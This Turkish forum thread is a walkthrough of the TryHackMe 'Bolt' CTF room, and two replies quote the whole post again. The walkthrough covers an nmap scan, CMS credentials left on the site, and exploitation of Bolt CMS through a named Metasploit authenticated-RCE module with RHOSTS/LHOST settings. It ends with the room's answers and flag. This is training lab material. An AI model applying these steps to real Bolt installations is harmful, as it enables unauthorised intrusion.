TryHackMe | Bolt CTF Çözümü

6 May 2022
124
79
rhti4x7.png





mjb232s.png

Öncelikle Herkese Merhaba Bugün Sizlerle "Bolt" İsimli Ctfyi çözeceğiz


LİNK = TryHackMe | Bolt



orjb4cc.png

1.sorumuz "CMS'nin çalıştığı bir web sunucusu hangi bağlantı noktası numarasına sahiptir?"

Bunu çözebilmek için bir nmap taraması yapmamız gerekli


dwzi7y9.PNG


3 tane açık port çıktı 22.port (ssh portu) 80.port (internet erişim protokolü HTTP (Hypertext Transfer Protocol) için kullanılan bir bağlantı noktası portudur.)
geriye 8000 port kalıyor demekki cmsnin çalıştığı port buymuş. biz genede bunu kontrol edelim diyerek siteyi 8000.portta çalıştırıyoruz


brjymjq.PNG



ve tahminimiz doğru çıkıyor

2.sorumuz "CMS'de bulabileceğimiz kullanıcı adı nedir?"

bu soruyu cevaplamak için sitede 8000.portta biraz geziniyoruz ve aşağıda adminin bıratığı notlarda usernameyi görüyoruz

5frd2ma.PNG


CEVAP : bolt

3.sorumuz "Kullanıcı adı için bulabileceğimiz şifre nedir ?"

bunun için 8000.portta biraz daha geziyoruz ve bir admin mesajına daha denk geliyoruz ve mesajda şifreyi görüyoruz

arx76wm.PNG


CEVAP = boltadmin123

4.sorumuz "Sunucuda cmsnin hangi sürümü yüklü? (Örn: İsim 1.1.1)"
bunu bulamımızın en kolay yolu admin panele giriş yapmak bunun için internette araştırıyoruz ve admin panele girebilmemimiz için /bolt yazmamız gerektiğini öğreniyoruz
ÖRNEK = http://<TARGET İP>:8000/bolt
ve admin panele geliyoruz bulduğumuz username ile passwordu giriyoruz

7wtz9xv.PNG


ve giriş yapıyoruz

jxxjxwr.PNG


ve sol aşağıda sürümünü görüyoruz

CEVAP = Bolt 3.7.1


5.sorumuz "Bu cms'nin önceki bir sürümü için authenticated RCE'ye izin veren bir istismar var. Exploit DB'de bulun. EDB-ID'si nedir?"

internete "bolt authenticated rce exploit db" yazıyoruz ve ilk sırada Bolt CMS 3.7.0 - Authenticated Remote Code Execution bu linkle karşılaşıyoruz
giriyoruz ve yukarda EDB-ID'sini görüyoruz


9nu1hx7.PNG


CEVAP = 48296

5.sorumuz "Metasploit kısa süre önce bu güvenlik açığı için bir exploit modülü ekledi. Bu exploitin tam yolu nedir? (Örn: exploit/....) Not: exploiti bulamıyorsanız, bunun nedeni büyük olasılıkla metasploit'iniz güncellenmemiş olmasıdır. ` apt update ` ve ardından ` apt install metasploit-framework ` komutunu çalıştırın"

Metasploite giriyoruz ve "search bolt" yazıyoruz ve karşımıza iki adet exploit çıkıyor bunlardan sitemize uygun olan exploit "exploit/unix/webapp/bolt_authenticated_rce" budur description kısmından anlayacağınız üzere.

ak9y474.PNG



CEVAP = exploit/unix/webapp/bolt_authenticated_rce

6.sorumuz "Makinenin içinde flag.txt dosyasını arayın."
bunun için makineye sızmamız gerekli ve metasploite girip "use exploit/unix/webapp/bolt_authenticated_rce" yazıp exploitimizi seçiyoruz

"set PASSWORD boltadmin123" yazarak şifremizi kaydediyoruz

"set USERNAME bolt" yazarak usernamemizi kaydediyoruz

"set RHOSTS <TARGET İP>" yazarak hedef makinemizi seçiyoruz

"set LHOST <İP ADRESİNİZ>" yazıyoruz

ve "run" veya "exploit" yazarak sızma işlememizi gerçekleştiriyoruz
şimdi makinede flagımızı arıyabiliriz

"cd /home" yazarak en başa geliyoruz ve "ls" komutu ile 3 dosya görüyoruz

mlnilo2.PNG


flag.txt yi cat toolü ile açıyoruz "cat flag.txt" yazıyoruz ve flagımızı görüyoruz

rt7kvxm.PNG


CEVAP = THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

İyi Günler Dilerim
 

JohnWick51

Uzman üye
20 Mar 2022
1,867
770
28
rhti4x7.png





mjb232s.png

Öncelikle Herkese Merhaba Bugün Sizlerle "Bolt" İsimli Ctfyi çözeceğiz


LİNK = TryHackMe | Bolt



orjb4cc.png

1.sorumuz "CMS'nin çalıştığı bir web sunucusu hangi bağlantı noktası numarasına sahiptir?"

Bunu çözebilmek için bir nmap taraması yapmamız gerekli


dwzi7y9.PNG


3 tane açık port çıktı 22.port (ssh portu) 80.port (internet erişim protokolü HTTP (Hypertext Transfer Protocol) için kullanılan bir bağlantı noktası portudur.)
geriye 8000 port kalıyor demekki cmsnin çalıştığı port buymuş. biz genede bunu kontrol edelim diyerek siteyi 8000.portta çalıştırıyoruz


brjymjq.PNG



ve tahminimiz doğru çıkıyor

2.sorumuz "CMS'de bulabileceğimiz kullanıcı adı nedir?"

bu soruyu cevaplamak için sitede 8000.portta biraz geziniyoruz ve aşağıda adminin bıratığı notlarda usernameyi görüyoruz

5frd2ma.PNG


CEVAP : bolt

3.sorumuz "Kullanıcı adı için bulabileceğimiz şifre nedir ?"

bunun için 8000.portta biraz daha geziyoruz ve bir admin mesajına daha denk geliyoruz ve mesajda şifreyi görüyoruz

arx76wm.PNG


CEVAP = boltadmin123

4.sorumuz "Sunucuda cmsnin hangi sürümü yüklü? (Örn: İsim 1.1.1)"
bunu bulamımızın en kolay yolu admin panele giriş yapmak bunun için internette araştırıyoruz ve admin panele girebilmemimiz için /bolt yazmamız gerektiğini öğreniyoruz
ÖRNEK = http://<TARGET İP>:8000/bolt
ve admin panele geliyoruz bulduğumuz username ile passwordu giriyoruz

7wtz9xv.PNG


ve giriş yapıyoruz

jxxjxwr.PNG


ve sol aşağıda sürümünü görüyoruz

CEVAP = Bolt 3.7.1


5.sorumuz "Bu cms'nin önceki bir sürümü için authenticated RCE'ye izin veren bir istismar var. Exploit DB'de bulun. EDB-ID'si nedir?"

internete "bolt authenticated rce exploit db" yazıyoruz ve ilk sırada Bolt CMS 3.7.0 - Authenticated Remote Code Execution bu linkle karşılaşıyoruz
giriyoruz ve yukarda EDB-ID'sini görüyoruz


9nu1hx7.PNG


CEVAP = 48296

5.sorumuz "Metasploit kısa süre önce bu güvenlik açığı için bir exploit modülü ekledi. Bu exploitin tam yolu nedir? (Örn: exploit/....) Not: exploiti bulamıyorsanız, bunun nedeni büyük olasılıkla metasploit'iniz güncellenmemiş olmasıdır. ` apt update ` ve ardından ` apt install metasploit-framework ` komutunu çalıştırın"

Metasploite giriyoruz ve "search bolt" yazıyoruz ve karşımıza iki adet exploit çıkıyor bunlardan sitemize uygun olan exploit "exploit/unix/webapp/bolt_authenticated_rce" budur description kısmından anlayacağınız üzere.

ak9y474.PNG



CEVAP = exploit/unix/webapp/bolt_authenticated_rce

6.sorumuz "Makinenin içinde flag.txt dosyasını arayın."
bunun için makineye sızmamız gerekli ve metasploite girip "use exploit/unix/webapp/bolt_authenticated_rce" yazıp exploitimizi seçiyoruz

"set PASSWORD boltadmin123" yazarak şifremizi kaydediyoruz

"set USERNAME bolt" yazarak usernamemizi kaydediyoruz

"set RHOSTS <TARGET İP>" yazarak hedef makinemizi seçiyoruz

"set LHOST <İP ADRESİNİZ>" yazıyoruz

ve "run" veya "exploit" yazarak sızma işlememizi gerçekleştiriyoruz
şimdi makinede flagımızı arıyabiliriz

"cd /home" yazarak en başa geliyoruz ve "ls" komutu ile 3 dosya görüyoruz

mlnilo2.PNG


flag.txt yi cat toolü ile açıyoruz "cat flag.txt" yazıyoruz ve flagımızı görüyoruz

rt7kvxm.PNG


CEVAP = THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

İyi Günler Dilerim
Ellerine saglik
 

The VODKA

Uzman üye
8 Haz 2022
1,331
9
920
rhti4x7.png





mjb232s.png

Öncelikle Herkese Merhaba Bugün Sizlerle "Bolt" İsimli Ctfyi çözeceğiz


LİNK = TryHackMe | Bolt



orjb4cc.png

1.sorumuz "CMS'nin çalıştığı bir web sunucusu hangi bağlantı noktası numarasına sahiptir?"

Bunu çözebilmek için bir nmap taraması yapmamız gerekli


dwzi7y9.PNG


3 tane açık port çıktı 22.port (ssh portu) 80.port (internet erişim protokolü HTTP (Hypertext Transfer Protocol) için kullanılan bir bağlantı noktası portudur.)
geriye 8000 port kalıyor demekki cmsnin çalıştığı port buymuş. biz genede bunu kontrol edelim diyerek siteyi 8000.portta çalıştırıyoruz


brjymjq.PNG



ve tahminimiz doğru çıkıyor

2.sorumuz "CMS'de bulabileceğimiz kullanıcı adı nedir?"

bu soruyu cevaplamak için sitede 8000.portta biraz geziniyoruz ve aşağıda adminin bıratığı notlarda usernameyi görüyoruz

5frd2ma.PNG


CEVAP : bolt

3.sorumuz "Kullanıcı adı için bulabileceğimiz şifre nedir ?"

bunun için 8000.portta biraz daha geziyoruz ve bir admin mesajına daha denk geliyoruz ve mesajda şifreyi görüyoruz

arx76wm.PNG


CEVAP = boltadmin123

4.sorumuz "Sunucuda cmsnin hangi sürümü yüklü? (Örn: İsim 1.1.1)"
bunu bulamımızın en kolay yolu admin panele giriş yapmak bunun için internette araştırıyoruz ve admin panele girebilmemimiz için /bolt yazmamız gerektiğini öğreniyoruz
ÖRNEK = http://<TARGET İP>:8000/bolt
ve admin panele geliyoruz bulduğumuz username ile passwordu giriyoruz

7wtz9xv.PNG


ve giriş yapıyoruz

jxxjxwr.PNG


ve sol aşağıda sürümünü görüyoruz

CEVAP = Bolt 3.7.1


5.sorumuz "Bu cms'nin önceki bir sürümü için authenticated RCE'ye izin veren bir istismar var. Exploit DB'de bulun. EDB-ID'si nedir?"

internete "bolt authenticated rce exploit db" yazıyoruz ve ilk sırada Bolt CMS 3.7.0 - Authenticated Remote Code Execution bu linkle karşılaşıyoruz
giriyoruz ve yukarda EDB-ID'sini görüyoruz


9nu1hx7.PNG


CEVAP = 48296

5.sorumuz "Metasploit kısa süre önce bu güvenlik açığı için bir exploit modülü ekledi. Bu exploitin tam yolu nedir? (Örn: exploit/....) Not: exploiti bulamıyorsanız, bunun nedeni büyük olasılıkla metasploit'iniz güncellenmemiş olmasıdır. ` apt update ` ve ardından ` apt install metasploit-framework ` komutunu çalıştırın"

Metasploite giriyoruz ve "search bolt" yazıyoruz ve karşımıza iki adet exploit çıkıyor bunlardan sitemize uygun olan exploit "exploit/unix/webapp/bolt_authenticated_rce" budur description kısmından anlayacağınız üzere.

ak9y474.PNG



CEVAP = exploit/unix/webapp/bolt_authenticated_rce

6.sorumuz "Makinenin içinde flag.txt dosyasını arayın."
bunun için makineye sızmamız gerekli ve metasploite girip "use exploit/unix/webapp/bolt_authenticated_rce" yazıp exploitimizi seçiyoruz

"set PASSWORD boltadmin123" yazarak şifremizi kaydediyoruz

"set USERNAME bolt" yazarak usernamemizi kaydediyoruz

"set RHOSTS <TARGET İP>" yazarak hedef makinemizi seçiyoruz

"set LHOST <İP ADRESİNİZ>" yazıyoruz

ve "run" veya "exploit" yazarak sızma işlememizi gerçekleştiriyoruz
şimdi makinede flagımızı arıyabiliriz

"cd /home" yazarak en başa geliyoruz ve "ls" komutu ile 3 dosya görüyoruz

mlnilo2.PNG


flag.txt yi cat toolü ile açıyoruz "cat flag.txt" yazıyoruz ve flagımızı görüyoruz

rt7kvxm.PNG


CEVAP = THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

İyi Günler Dilerim
Ellerine Sağlık... Güzel konu.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.